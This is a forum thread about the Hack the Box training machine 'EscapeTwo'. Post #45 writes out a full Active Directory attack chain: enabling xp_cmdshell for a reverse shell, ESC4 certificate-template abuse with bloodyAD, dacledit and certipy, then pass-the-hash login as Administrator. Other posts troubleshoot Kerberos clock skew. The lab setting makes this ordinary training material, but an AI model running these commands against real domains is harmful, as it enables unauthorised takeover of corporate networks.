EscapeTwo Hack the Box Season 7 (windows easy)
by RedBlock - Saturday January 11, 2025 at 03:43 PM
#41
(Jan 12, 2025, 01:07 PM)Art10n Wrote: bloodyAD is a Windows or a Linux app?

Linux. You can find the repo here: https://github.com/CravateRouge/bloodyAD.git
Reply
#42
(Jan 13, 2025, 04:37 AM)akorshikai Wrote:
(Jan 12, 2025, 01:07 PM)Art10n Wrote: bloodyAD is a Windows or a Linux app?

Linux. You can find the repo here: https://github.com/CravateRouge/bloodyAD.git

In this link there is only a .exe (for Windows). Let me rephrase my question:

In Linux, can I do the same thing that bloodyAD does?
Reply
#43
(Jan 11, 2025, 03:43 PM)LostGem Wrote: Season 7 is finally here.

Thanks all of you!!!

Reply
#44
(Jan 13, 2025, 05:00 AM)Art10n Wrote:
(Jan 13, 2025, 04:37 AM)akorshikai Wrote:
(Jan 12, 2025, 01:07 PM)Art10n Wrote: bloodyAD is a Windows or a Linux app?

Linux. You can find the repo here: https://github.com/CravateRouge/bloodyAD.git

In this link there is only a .exe (for Windows). Let me rephrase my question:

In Linux, can I do the same thing that bloodyAD does?

Check the wiki, you can install it using pip or by cloning the repository with git.
Reply
#45
(Jan 12, 2025, 04:50 PM)greenfire Wrote:
(Jan 11, 2025, 11:34 PM)KochiyaS Wrote: mssqlclient.py -p 1433 'sa'@dc01.sequel.htb -dc-ip {ip} (login with password found in unpacked excel spreadsheet found in smb share as rosa)
enable_xp_cmdshell
execute powershell #3 base64 reverse shell with your xpcmdshell
find ryan password in sql ini file on the box as sql_svc
login as ryan to get user txt
ingest with bloodhound to find you have write all on the ca svc that can do esc4 attack as ryan

exploitation:
bloodyAD --host dc01.sequel.htb -d sequel.htb -u ryan -p {ryan_pass} set owner ca_svc ryan
dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'{ryan_pass}'
certipy-ad shadow auto -u ryan@sequel.htb -p '{ryan_pass}' -dc-ip {ip} -ns {ip} -target dc01.sequel.htb -account ca_svc
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip {ip} -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip {ip}
certipy-ad req -u ca_svc -hashes :{ca_svc_hash} -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip {ip} -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns {ip} -dns {ip}
certipy-ad auth -pfx ./administrator.pfx -dc-ip {ip}
evil-winrm -i dc01.sequel.htb -u administrator -H {admin_hash}

note: if you get some dumb shit DNS error it's because the automation reverted the template, so you need to redo the steps

When running: 
certipy-ad auth -pfx ./administrator.pfx -dc-ip {ip}  --> Got the following error:
└─$ ./certipy auth -pfx ./administrator_dc01.pfx -dc-ip x.x.x.x
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[-] Got error: [Errno 2] No such file or directory: './administrator_dc01.pfx'
[-] Use -debug to print a stacktrace

certipy-ad req -u ca_svc -hashes :{ca_svc_hash} -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip {ip} -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns {ip} -dns {ip}

This command will generate the admin pfx that you use for auth. It will show you the path as well, so just substitute the path. You are getting that error because the file isn't in your pwd.
Reply
#46
How do you get to this conclusion for root? When I run Bloodhound I get it telling me to just do a DCSync attack when marking Ryan as owned and using shortest path to Domain Admins. Thanks!
Reply
#47
(Jan 14, 2025, 04:04 PM)Dispute22311 Wrote: How do you get to this conclusion for root? When I run Bloodhound I get it telling me to just do a DCSync attack when marking Ryan as owned and using shortest path to Domain Admins. Thanks!

Are you using the old BloodHound which comes with Kali? It is deprecated; BloodHound Community Edition supports ADCS and will show you the attack route for the cert template. Old BloodHound will not show you ADCS.
You will also have to use a compatible remote ingestor; an ingestor like nxc, bloodhound-python, or bloodhound.py will not ingest the CA info. You can use rusthound-ce as it supports BHCE.
Reply
#48
Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad,

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '6ea78542-00b7-1ec4-54d0-7c757188d0e5'
[*] Adding Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': None

I'm pretty sure the NT hash is not supposed to be None

I don't know what the hell to do anymore.

A little nudge peeps.
Reply
#49
(Jan 15, 2025, 01:38 PM)Aloha_SnackBar Wrote: Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad,

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '6ea78542-00b7-1ec4-54d0-7c757188d0e5'
[*] Adding Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': None

I'm pretty sure the NT hash is not supposed to be None

I don't know what the hell to do anymore.

A little nudge peeps.

Can you paste the command you used? Judging by the error message, you likely have a clock skew error that can be corrected using faketime or rdate.
Reply
#50
(Jan 15, 2025, 01:38 PM)Aloha_SnackBar Wrote: Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad,

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '6ea78542-00b7-1ec4-54d0-7c757188d0e5'
[*] Adding Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': None

I'm pretty sure the NT hash is not supposed to be None

I don't know what the hell to do anymore.

A little nudge peeps.

Kerberos clock skew error; you need to sync your time with the DC:

sudo su
(in root term) timedatectl set-ntp off; ntpdate {dc_ip}

Then, when you are done: timedatectl set-ntp on
Reply
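Since the KRB_AP_ERR_SKEW failure in posts #48 to #50 only shows up after certipy has already added and then restored the Key Credential, it is worth checking the clock before any Kerberos request is made. The POSIX shell helper below is an added example, not code posted by anyone in this thread: it queries the DC's clock with `ntpdate -q` (query only, the local clock is not adjusted), parses the reported offset, and compares it against the Kerberos default tolerance of 5 minutes (300 s). The DC address argument and the sample `ntpdate` line in the comment are constructed placeholders.

```shell
#!/bin/sh
# Added example: pre-flight Kerberos clock-skew check against a DC.
# Not from the thread; the DC address and the sample ntpdate line are constructed.

KRB_MAX_SKEW=300   # seconds: the Kerberos default clockskew tolerance (5 minutes)

# skew_from_ntpdate LINE
# Extract the "offset" value (seconds) from an `ntpdate -q` summary line, e.g.
#   server 10.0.0.1, stratum 1, offset -7212.123456, delay 0.02567   (constructed)
skew_from_ntpdate() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i < NF; i++)
            if ($i == "offset") { v = $(i + 1); sub(/,$/, "", v); print v; exit }
    }'
}

# skew_ok OFFSET [LIMIT]
# Succeed (exit 0) when |OFFSET| <= LIMIT seconds, fail (exit 1) otherwise.
skew_ok() {
    awk -v off="$1" -v lim="${2:-$KRB_MAX_SKEW}" 'BEGIN {
        off += 0; lim += 0
        if (off < 0) off = -off
        if (off <= lim) exit 0
        exit 1
    }'
}

# check_dc_clock DC_IP
# Query the DC clock without touching the local one and report whether a
# Kerberos request would be rejected with KRB_AP_ERR_SKEW.
# Exit codes: 0 within tolerance, 1 skew too large, 2 query failed.
check_dc_clock() {
    dc="$1"
    line=$(ntpdate -q "$dc" 2>/dev/null | grep 'offset' | head -n 1)
    if [ -z "$line" ]; then
        echo "ntpdate query to $dc failed (is udp/123 reachable and ntpdate installed?)"
        return 2
    fi
    off=$(skew_from_ntpdate "$line")
    if skew_ok "$off"; then
        echo "offset ${off}s from $dc: within the ${KRB_MAX_SKEW}s Kerberos tolerance"
        return 0
    fi
    echo "offset ${off}s from $dc: exceeds ${KRB_MAX_SKEW}s, expect KRB_AP_ERR_SKEW"
    echo "fix: timedatectl set-ntp off; ntpdate $dc   (re-enable NTP when done)"
    return 1
}

# Usage: sh skewcheck.sh {dc_ip}
if [ "$#" -gt 0 ]; then
    check_dc_clock "$1"
fi
```

Run it with the DC address before `certipy-ad shadow auto`; a non-zero exit means the TGT request will fail exactly as in post #48, and the restored Key Credential with "NT hash: None" is the expected side effect of that failure rather than a separate problem.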